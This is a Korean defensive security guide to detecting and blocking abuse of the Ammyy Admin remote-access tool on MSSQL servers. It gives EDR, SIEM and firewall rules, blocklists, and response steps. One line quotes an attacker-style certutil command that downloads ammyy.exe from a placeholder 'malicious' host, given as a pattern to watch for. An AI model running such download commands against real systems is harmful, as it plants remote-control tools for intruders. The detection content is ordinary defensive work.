MSSQL 대상 Ammyy Admin 공격 대응: EDR · SIEM · Firewall 통합 방어법

Ammyy Admin은 원격 데스크톱 소프트웨어 중 하나로, 악성 행위자들이 자주 악용하는 도구입니다. 특히 MSSQL 서버를 대상으로 한 침해사고 사례에서 이 도구가 종종 등장합니다.

기본 개념

• 원격 제어 소프트웨어로, 사용자가 네트워크를 통해 다른 컴퓨터를 제어할 수 있도록 설계됨
• GUI 기반으로 설치가 간편하며 포터블 실행 파일 형태로 동작함
• 원격 데스크톱, 파일 전송, 음성 채팅 기능 제공
• 기업에서 IT 지원 용도로 사용되기도 하지만, 공격자에게는 무인증 원격 제어 수단이 되기도 함

주요 특징

• 설치 불필요: 다운로드 후 바로 실행 가능
• 서비스로 등록 가능: 재부팅 후에도 자동 실행 가능
• 방화벽 우회 용이: 기본적으로 TCP 포트 443을 사용하며, 별도 포트 설정도 가능

⚠️ 보안 위협 및 악용 사례

MSSQL 서버 대상 침해사고에서의 악용

• 공격자는 취약한 계정 비밀번호 또는 무차별 대입 공격을 통해 MSSQL 서버의 RDP 또는 명령어 쉘에 접근
• 접근 후 Ammyy Admin을 업로드하고 실행
• 이후 공격자는 GUI 기반 원격 제어 환경을 구축하고, 내부 추가 침투 시도

Ammyy Admin을 활용한 주요 행위

• 백도어 설치: 공격자가 장기적인 제어를 위한 RAT 또는 C2 서버와의 연동
• 권한 상승: 로컬 관리자 권한 확보
• 데이터 탈취: DB, 인증정보, 로그 등 수집
• Ransomware 배포 또는 Cryptominer 설치

기타 유사 도구와의 비교

도구명	특징	보안 위협 수준
Ammyy Admin	설치 필요 없음, 암호화 통신	높음
AnyDesk	설치 및 실행 쉬움	높음
TeamViewer	GUI 친화적, 원격 지원에 사용	중간
RDP	OS 기본 기능, 포트 스캐닝 대상	높음

🛡️ 보안 대응 전략

탐지 및 모니터링

• YARA 룰 또는 SIEM 룰로 AA_v3.exe, Ammyy_Admin.exe 등의 실행 감지
• 프로세스 모니터링
  • 의심 명령: cmd.exe /c certutil -urlcache -split -f http://malicious/ammyy.exe
• Wazuh / Elastic Security 탐지 룰 예시

  {
    "rule_id": "910010",
    "description": "Suspicious Ammyy Admin execution",
    "condition": "process.name == 'AA_v3.exe'"
  }

방어 설정

• MSSQL 포트(1433) 외부 노출 금지
• 계정 잠금 정책 및 다단계 인증(MFA) 적용
• 파일 실행 제한 정책(AppLocker, WDAC)에서 Ammyy Admin 실행 차단
• 레지스트리 및 서비스 등록 모니터링
  • 키: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

내부 점검 포인트

• Ammyy Admin 또는 유사 도구의 실행 흔적이 있는지 확인
• C:\Users\*\Downloads, Temp, ProgramData 등 의심 경로 내 실행 파일 확인
• 네트워크 통신 이력 점검
  • netstat -ano | findstr :443
  • 의심 프로세스가 외부 IP와 통신 중인지 확인

대응 절차 예시 (침해 시)

1. 실행 파일 위치 확인 및 삭제
2. 백도어 또는 추가 악성코드 유무 확인
3. 로그 수집 및 침해경로 분석
4. 계정 초기화 및 재인증
5. 내부 사용자에게 보안 공지 및 재교육

❗ 보안 공지: 원격 제어 도구 Ammyy Admin 관련 주의사항

최근 외부에서 Ammyy Admin 도구를 이용해 MSSQL 서버에 무단 접근한 사례가 보고되었습니다.
아래와 같은 보안 수칙을 준수해 주시기 바랍니다.

• 원격 제어 도구를 임의로 설치하거나 실행하지 마세요.
• 불분명한 이메일이나 링크를 통해 받은 실행 파일은 즉시 삭제하세요.
• 관리자 권한 사용 시, 업무 목적 외 사용을 삼가주세요.
• 시스템이 이상 징후를 보일 경우 보안팀에 즉시 신고 바랍니다.

 

Ammyy Admin은 원래 정상 소프트웨어지만, MSSQL 서버와 같은 중요 자산에 대한 침투 시 악용될 수 있는 도구입니다. 특히 비인가 접근, 계정 탈취, 백도어 설치 등의 정황에서 자주 등장하므로, 로그 분석 및 EDR 연계 보안 체계를 활용한 탐지와 차단이 필수적입니다. Ammyy Admin의 악용에 대비하여 EDR, ESM(SIEM), Firewall 시스템에서 연동 가능한 탐지 룰을 설계할 때는 다음 세 가지 관점을 고려해야 합니다.

1. 프로세스 기반 탐지 (EDR)
2. 로그 기반 상관 분석 (SIEM/ESM)
3. 네트워크 기반 차단 및 모니터링 (Firewall)

아래는 Ammyy Admin 관련 탐지 룰을 보안 솔루션별 예시입니다.

300x250

EDR 탐지 룰 (예: Elastic Defend, Wazuh, SentinelOne)

Elastic Defend용 KQL 탐지 룰

process.name : "AA_v3.exe" or 
process.name : "Ammyy_Admin.exe" or
process.pe.original_file_name : "Ammyy_Admin.exe"

의도: Ammyy Admin의 실행 파일 이름, PE 파일 메타정보로 탐지
대응 액션: Alert 생성 및 자동 Kill Process

Wazuh 룰 예시 (/var/ossec/etc/rules/local_rules.xml)

<group name="ammyy, malicious-remote-control">
  <rule id="910010" level="10">
    <if_sid>61601</if_sid>
    <match>AA_v3.exe|Ammyy_Admin.exe</match>
    <description>Ammyy Admin remote access tool execution detected</description>
    <group>malware, remote_access_tool</group>
  </rule>
</group>

전제: process name을 모니터링하는 Wazuh Sysmon agent 또는 Auditd 설정 필수

SIEM/ESM 탐지 룰 (예: Elastic SIEM, ArcSight, Splunk)

Elastic SIEM - KQL

(event.action:"Process Create" and 
 process.name:("AA_v3.exe", "Ammyy_Admin.exe")) 
or 
file.path : "*\\AA_v3.exe" 
or 
file.path : "*\\Ammyy_Admin.exe"

Splunk SPL

index=windows sourcetype=WinEventLog:Security 
(Image="*AA_v3.exe" OR Image="*Ammyy_Admin.exe")
| stats count by ComputerName, User, Image, _time

ArcSight 룰 (Pseudo-code)

IF 
  DeviceProduct = "Windows" AND 
  (FileName = "AA_v3.exe" OR FileName = "Ammyy_Admin.exe")
THEN 
  Set EventSeverity = High 
  AND Trigger Alert: "Ammyy Admin Execution Detected"

활용 팁: 이 탐지 룰은 EDR에서 수집된 로그 또는 Sysmon/Event Log 전송 기반의 SIEM에 연동하여 사용 가능

Firewall 탐지 룰 (네트워크 차단 및 이상 트래픽 분석)

Ammyy Admin은 기본적으로 TCP 포트 443, RemoteHost 통신을 사용합니다.

L7 Firewall 룰 예시 (FortiGate, Palo Alto 등)

• 목적: Ammyy Admin이 사용하는 특정 IP 또는 Domain 차단
• Application: Custom Signature Rule Name: "Block Ammyy Admin traffic" Pattern: "ammyy.com" in HTTP Host header or TLS SNI Action: Block
• Domain/IP 기반 차단 목록 (예시)
  • ammyy.com
  • srv.ammyy.com
  • 94.242.58.146 (이전 사용 사례)

Snort/Suricata 룰 예시

alert tcp any any -> any 443 (msg:"Ammyy Admin connection attempt"; 
flow:to_server,established; 
content:"ammyy"; nocase; 
tls_sni; 
sid:1000011; rev:1;)

참고: Suricata를 사용하는 경우 TLS SNI 필드에서 ammyy 문자열을 감지

연동 운영 전략

구성 요소	연동 대상	역할 및 목적
EDR	Elastic Defend, Wazuh	프로세스 실행 및 행위 기반 탐지
SIEM	Splunk, Elastic SIEM	이벤트 집계 및 상관분석, 대시보드 구축
Firewall	Palo Alto, FortiGate	도메인/IP 기반 차단 및 SNI 탐지

• 경고 알림 자동화
  • SOAR 또는 n8n, TheHive 등과 연계하여 자동 알림 또는 티켓 생성
• 행위 기반 상관 분석
  • "외부 접속 + Ammyy Admin 실행" = 위험도 상승
  • "인증 실패 로그 + 실행 파일 업로드" = 공격 징후

 

Ammyy Admin은 정식 소프트웨어임에도 불구하고 공격자에게 원격 제어의 수단으로 매우 자주 악용됩니다.

따라서 다음과 같은 체계적인 대응이 필요합니다.

• EDR에서 실행 시도 즉시 탐지 및 차단
• SIEM에서 실행 패턴을 시각화하고 상관 분석
• Firewall에서 통신 흐름 제어 및 SNI 필터링